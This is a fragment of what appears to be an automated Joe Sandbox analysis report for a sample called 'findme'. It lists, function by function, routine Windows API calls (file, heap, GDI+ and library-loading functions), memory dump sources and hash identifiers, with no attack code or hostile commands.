                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: edcafd10bb7da1964e8f0972c19f5ea318998f0e61ca845c6b3ce6ba878c7760
                    • Instruction ID: a5afe224bd7f1064d82d8e8514935a5b6ff8b52109a5c2e5cb09a2f67388efb5
                    • Opcode Fuzzy Hash: edcafd10bb7da1964e8f0972c19f5ea318998f0e61ca845c6b3ce6ba878c7760
                    • Instruction Fuzzy Hash: C401E53A204205BF8B48CF25AC88E7BB359BFC1721B14453FE81683280EA38EC059629
                    APIs
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 004C9E76
                    • GetLastError.KERNEL32 ref: 004C9E82
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 287c3c9cdab1a09a915bf77855102a4352d301c4ad484688a0d8793379747e96
                    • Instruction ID: 85dd503cbaaf0a590e5ec37fa625a74218f060d4cb55b055ece692b2792da806
                    • Opcode Fuzzy Hash: 287c3c9cdab1a09a915bf77855102a4352d301c4ad484688a0d8793379747e96
                    • Instruction Fuzzy Hash: 9C018C793042006BEB749E299888B6BB6D99B98319F15893FB146C36C0DB39EC488619
                    APIs
                    • _free.LIBCMT ref: 004E8627
                      • Part of subcall function 004E8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004EC13D,00000000,?,004E67E2,?,00000008,?,004E89AD,?,?,?), ref: 004E854A
                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00500F50,004CCE57,?,?,?,?,?,?), ref: 004E8663
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocate_free
                    • String ID:
                    • API String ID: 2447670028-0
                    • Opcode ID: bbf9bda03de6d3bbe91320b9b1bbaa9a27cc9cff0a49d10ea6a2c3e58f6ed552
                    • Instruction ID: ef55a608418e81dc3978cab5e1916534d41488c72000f428200a1e21bdb3d4de
                    • Opcode Fuzzy Hash: bbf9bda03de6d3bbe91320b9b1bbaa9a27cc9cff0a49d10ea6a2c3e58f6ed552
                    • Instruction Fuzzy Hash: 6CF0C2315015D56ACF212B33AC00E6F37689FE27B7F24421FF81C96291DE2CC80295AD
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?), ref: 004D0915
                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 004D091C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Process$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1231390398-0
                    • Opcode ID: eecdbdcfce278150956a8614c433817e1de3b0cca5e043c7f7520a55eb438648
                    • Instruction ID: bcfc4b46fd414b8e466d2a0c3c8baa39c53f6872763ca5a0d09d206e2158b224
                    • Opcode Fuzzy Hash: eecdbdcfce278150956a8614c433817e1de3b0cca5e043c7f7520a55eb438648
                    • Instruction Fuzzy Hash: 80E092B2A10109BB6F09CAB49C34ABB739DEB04215B2041FBA806D3301F938DE0186AC
                    APIs
                    • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA458
                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004CA27A,?,?,?,004CA113,?,00000001,00000000,?,?), ref: 004CA489
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 3e7c6e9847f6193bc32bfaa20f7ecfa2c29434645aa175f501f3c7356328a06a
                    • Instruction ID: cb650d17ed24efe5705151532d4fb60676e3d6f11561fbf24d6bf096967db2cd
                    • Opcode Fuzzy Hash: 3e7c6e9847f6193bc32bfaa20f7ecfa2c29434645aa175f501f3c7356328a06a
                    • Instruction Fuzzy Hash: 2CF0A73524020D7BDF419F61DC05FEA375CBB05389F04806ABC4886261DB7589B4EA58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemText_swprintf
                    • String ID:
                    • API String ID: 3011073432-0
                    • Opcode ID: 7790b93624fe7c19bbf28467d83f2ead06afd389f4b9e326e9551b7eacc7b499
                    • Instruction ID: c3df48847af10c1b68bb3f4a9e5dda30c0bb7cd7f466588b5697d9ba8b6ad75a
                    • Opcode Fuzzy Hash: 7790b93624fe7c19bbf28467d83f2ead06afd389f4b9e326e9551b7eacc7b499
                    • Instruction Fuzzy Hash: 9FF05C319003487ADB11AB719C03FAE371C9B0574DF00096FB601531A2D9796A249766
                    APIs
                    • DeleteFileW.KERNELBASE(?,?,?,004C984C,?,?,004C9688,?,?,?,?,004F1FA1,000000FF), ref: 004CA13E
                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,004C984C,?,?,004C9688,?,?,?,?,004F1FA1,000000FF), ref: 004CA16C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 0b7a3257f3154fc09456d10286f95c8e26fbcb0854fea3a85935e7cd90546d3e
                    • Instruction ID: 9dd57be5bd7b0831c747fb402caf3b0a1da9267839168214ea5bb34f77a7a64d
                    • Opcode Fuzzy Hash: 0b7a3257f3154fc09456d10286f95c8e26fbcb0854fea3a85935e7cd90546d3e
                    • Instruction Fuzzy Hash: C6E06D3964020C6ADB11AE61DC41FEA775CEB08386F48406BB888C6164DF65DDA4EA99
                    APIs
                    • GdiplusShutdown.GDIPLUS(?,?,?,?,004F1FA1,000000FF), ref: 004DA3D1
                    • CoUninitialize.COMBASE(?,?,?,?,004F1FA1,000000FF), ref: 004DA3D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: GdiplusShutdownUninitialize
                    • String ID:
                    • API String ID: 3856339756-0
                    • Opcode ID: 2a3d1565ba0643f2ca9b952418f6a961b66146acfffaab83cb3ffea60e4ee1d8
                    • Instruction ID: 4c7c945f32b9dc151ab016d7974d74a8357e3441b24dacc35614bfa0c2fee849
                    • Opcode Fuzzy Hash: 2a3d1565ba0643f2ca9b952418f6a961b66146acfffaab83cb3ffea60e4ee1d8
                    • Instruction Fuzzy Hash: 30F03032518654EFC7109B4DDC05B19FBA8FB49B20F04436AF41983760CB786811CA95
                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,?,004CA189,?,004C76B2,?,?,?,?), ref: 004CA1A5
                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,004CA189,?,004C76B2,?,?,?,?), ref: 004CA1D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 36104da67117b0d8f265137d175bbeb674b6fc2764c3023269c4bd61d812bcf1
                    • Instruction ID: e47316e74b86429c560d4b37f0b0feecd81f04da88bdc5f173197aa69563a95c
                    • Opcode Fuzzy Hash: 36104da67117b0d8f265137d175bbeb674b6fc2764c3023269c4bd61d812bcf1
                    • Instruction Fuzzy Hash: 39E02B3690001C6BCB51AB64CC05FE5775CEB093E6F040177FD44D3290CB708D548AD4
                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004D00A0
                    • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004CEB86,Crypt32.dll,00000000,004CEC0A,?,?,004CEBEC,?,?,?), ref: 004D00C2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystem
                    • String ID:
                    • API String ID: 1175261203-0
                    • Opcode ID: 2bb58ffb5f66dad335566d836bc022bc98d7dc890a1886d5ecdfa087af07af88
                    • Instruction ID: b997bc5e173d2cf95b71e4dd7bf902163adbd1cc9a258534c4d6247b79548135
                    • Opcode Fuzzy Hash: 2bb58ffb5f66dad335566d836bc022bc98d7dc890a1886d5ecdfa087af07af88
                    • Instruction Fuzzy Hash: 8BE0127690111C6ADB61AAA5EC05FE677ACEF09382F0400ABB948D3104DA749A54CBE9
                    APIs
                    • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 004D9B30
                    • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 004D9B37
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: BitmapCreateFromGdipStream
                    • String ID:
                    • API String ID: 1918208029-0
                    • Opcode ID: 7845f4624eb36a0d8f16c439b22a4bd498384c2e539e2dae431ef6392f958368
                    • Instruction ID: d24078f2cc85ae0dddb2875feb8b7850fe95f1277b3583f98dae75fc724ca941
                    • Opcode Fuzzy Hash: 7845f4624eb36a0d8f16c439b22a4bd498384c2e539e2dae431ef6392f958368
                    • Instruction Fuzzy Hash: CDE0ED71901218EBDB10EF99D5017AAB7F8EB04321F10809FE895D7301D7796E049B95
                    APIs
                      • Part of subcall function 004E329A: try_get_function.LIBVCRUNTIME ref: 004E32AF
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004E217A
                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 004E2185
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                    • String ID:
                    • API String ID: 806969131-0
                    • Opcode ID: 6be2f47a1cddca9e8fa2e895cb5e58860e004acdcd7d9a47c91015316efbf61d
                    • Instruction ID: 9a1d01db9eeebc5616c7a43b755aa0167ba2bcbe1513de41b2413f1cd609d1dd
                    • Opcode Fuzzy Hash: 6be2f47a1cddca9e8fa2e895cb5e58860e004acdcd7d9a47c91015316efbf61d
                    • Instruction Fuzzy Hash: 25D0A7341043C535E9082BB33A465AA534C6F53B7B3F0064BE720C61D1EEDC4301611D
                    APIs
                    • DloadLock.DELAYIMP ref: 004DDC73
                    • DloadProtectSection.DELAYIMP ref: 004DDC8F
                      • Part of subcall function 004DDE67: DloadObtainSection.DELAYIMP ref: 004DDE77
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Dload$Section$LockObtainProtect
                    • String ID:
                    • API String ID: 731663317-0
                    • Opcode ID: a03476922ad819b1f679fb3cd2b2b5d22bc975eedfe96a3d05b690329e679a93
                    • Instruction ID: 3bb9669592201951610d7901829a81201e785d6d7bef50dec6e9216220d79f24
                    • Opcode Fuzzy Hash: a03476922ad819b1f679fb3cd2b2b5d22bc975eedfe96a3d05b690329e679a93
                    • Instruction Fuzzy Hash: 07D0A7B09402104AC210AB10585131C6270BB16748F501507A105923D5CBBC0845D10D
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ItemShowWindow
                    • String ID:
                    • API String ID: 3351165006-0
                    • Opcode ID: e666dfe24d2dac03f39b1b35eaf0ed2a774de85d279740b77285b7ed2eb122d8
                    • Instruction ID: 1627be43dbeb5a53cb8dc4aa2d3b01d9b2f9428fc64a82e25e6e6c4ca1103585
                    • Opcode Fuzzy Hash: e666dfe24d2dac03f39b1b35eaf0ed2a774de85d279740b77285b7ed2eb122d8
                    • Instruction Fuzzy Hash: 86C0123A058200BECB010BB0DC09D3FBBA8AFA6212F05C908B2A5C0060C238C028EB11
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: f8971ed589b2ede2fe48bb9dcac7403f93c86a71931bd558b7f3e22a00b30214
                    • Instruction ID: 422f7d56235c1180f06a696fdaa298298e542883a6789f5d6d23b90110ca3920
                    • Opcode Fuzzy Hash: f8971ed589b2ede2fe48bb9dcac7403f93c86a71931bd558b7f3e22a00b30214
                    • Instruction Fuzzy Hash: 2AC1A378A042449FDF54DF68C484FAA7BA1AF06304F1840BFEC469B363DB399944CB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 27b9ce0ab56df0a617f52337b7dff5d2f5f094a8f2cdf60b216350d8b2e83d18
                    • Instruction ID: 4dfb4a1da9feffaa99798334864360b2b0abcb9795e99080635932340f14c1a3
                    • Opcode Fuzzy Hash: 27b9ce0ab56df0a617f52337b7dff5d2f5f094a8f2cdf60b216350d8b2e83d18
                    • Instruction Fuzzy Hash: F671D079100F44AADB61DF30CC41FEBB7E8AB14306F44895FE5AB47242DA3A6A48CF15
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C8384
                      • Part of subcall function 004C1380: __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C1380: new.LIBCMT ref: 004C13FE
                      • Part of subcall function 004C19A6: __EH_prolog.LIBCMT ref: 004C19AB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: 731c658ce46938712a9a42c92d7c8bc5262f86fb0ca8ffd0c959cfad211d895b
                    • Instruction ID: 21c849af14914a7a1b08098c5766fcb7990cdcc1d0a8b52966efd15ce5616473
                    • Opcode Fuzzy Hash: 731c658ce46938712a9a42c92d7c8bc5262f86fb0ca8ffd0c959cfad211d895b
                    • Instruction Fuzzy Hash: 8441D635800654AADB64DB61C855FEA73A8AF10308F0440EFE54A93193EF795AC9DB58
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C1E05
                      • Part of subcall function 004C3B3D: __EH_prolog.LIBCMT ref: 004C3B42
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: a11f90a8d9a19f8fe5c4529c391102ff46c6c2bc1daeda8726ae7e1f3cd8ffd6
                    • Instruction ID: ef1a7b18ef72a68836240a297ce0a1b34b04ba090573afb72d8eac713888321d
                    • Opcode Fuzzy Hash: a11f90a8d9a19f8fe5c4529c391102ff46c6c2bc1daeda8726ae7e1f3cd8ffd6
                    • Instruction Fuzzy Hash: 1F213935904148AFCB51EF9AD951EEEBBF5BF59304B1000AFE845A7262CB365E10CB68
                    APIs
                    • __EH_prolog.LIBCMT ref: 004DA7C8
                      • Part of subcall function 004C1380: __EH_prolog.LIBCMT ref: 004C1385
                      • Part of subcall function 004C1380: new.LIBCMT ref: 004C13FE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: H_prolog
                    • String ID:
                    • API String ID: 3519838083-0
                    • Opcode ID: e37cab2c85a1f48a764c78f6ad1d56ba80def44231cd041c60d9c3fe34ddeb79
                    • Instruction ID: bccf4dcbef2b1475e4349e3a1f6b3c33fad9df79ddfdf3e1be1e973a764f1af5
                    • Opcode Fuzzy Hash: e37cab2c85a1f48a764c78f6ad1d56ba80def44231cd041c60d9c3fe34ddeb79
                    • Instruction Fuzzy Hash: 0F21AD75C04249AECF10EF56C8519EEB7B4EF1A304F0004AFE809A3312DB396E06DB65
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
